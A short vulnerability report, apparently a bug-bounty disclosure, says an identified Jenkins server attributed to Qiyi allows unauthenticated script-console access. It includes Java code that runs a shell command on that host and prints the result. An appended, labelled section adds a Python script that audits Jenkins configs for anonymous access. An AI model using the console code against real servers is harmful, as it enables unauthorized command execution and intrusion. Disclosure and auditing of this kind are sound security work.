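http://220.181.109.120:8080/ is a Jenkins platform that allows unauthorized access; it should belong to Qiyi. See the screenshot:
Commands can also be executed directly, and going deeper would make it possible to penetrate the internal network (I did not dare to test this without authorization).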
// Run a command on the Jenkins host and print what it returns
Runtime runtime = Runtime.getRuntime();
Process process = runtime.exec("id");
BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
String inline;
String returnvalue = "";
// Read the command's standard output line by line
while ((inline = br.readLine()) != null) {
    returnvalue += inline;
}
br.close();
out.println(returnvalue);
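A defender-side check for the exposure reported above, as an added example that is not part of the original report: it audits a Jenkins `config.xml` for settings that let an anonymous visitor reach the script console. The sample configs are constructed, the function name is hypothetical, and the classic `config.xml` layout (`useSecurity`, `authorizationStrategy`, `permission` entries) is assumed.

```python
import xml.etree.ElementTree as ET

# Constructed sample configs (assumed layout; not taken from the reported host).
OPEN_CONFIG = "<hudson><useSecurity>false</useSecurity></hudson>"
ANON_ADMIN_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:anonymous</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
</hudson>"""
LOCKED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
</hudson>"""

# Permissions that open the script console to whoever holds them.
SCRIPT_PERMS = {"hudson.model.Hudson.Administer", "hudson.model.Hudson.RunScripts"}


def audit_jenkins_config(xml_text):
    """Return findings describing what an anonymous visitor is allowed to do."""
    root = ET.fromstring(xml_text)
    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        return ["useSecurity is not true: anonymous visitors get full control"]
    strategy = root.find("authorizationStrategy")
    if strategy is None:
        return ["no authorizationStrategy element: check the effective strategy"]
    cls = strategy.get("class", "")
    findings = []
    if cls.endswith("$Unsecured"):
        findings.append("Unsecured strategy: anonymous visitors get full control")
    if cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        if (strategy.findtext("denyAnonymousReadAccess") or "").strip() != "true":
            findings.append("anonymous read access is allowed")
    for perm in strategy.iter("permission"):
        # Entries look like "PERMISSION:sid" or, in newer files, "USER:PERMISSION:sid".
        parts = (perm.text or "").strip().split(":")
        if len(parts) >= 2 and parts[-1] == "anonymous":
            level = "script console" if parts[-2] in SCRIPT_PERMS else "granted"
            findings.append(f"anonymous has {parts[-2]} ({level})")
    return findings


if __name__ == "__main__":
    for name in ("OPEN_CONFIG", "ANON_ADMIN_CONFIG", "LOCKED_CONFIG"):
        print(name, audit_jenkins_config(globals()[name]))
```

An empty list means none of the checked settings grant anything to anonymous users; it does not cover plugins that supply their own authorization strategy.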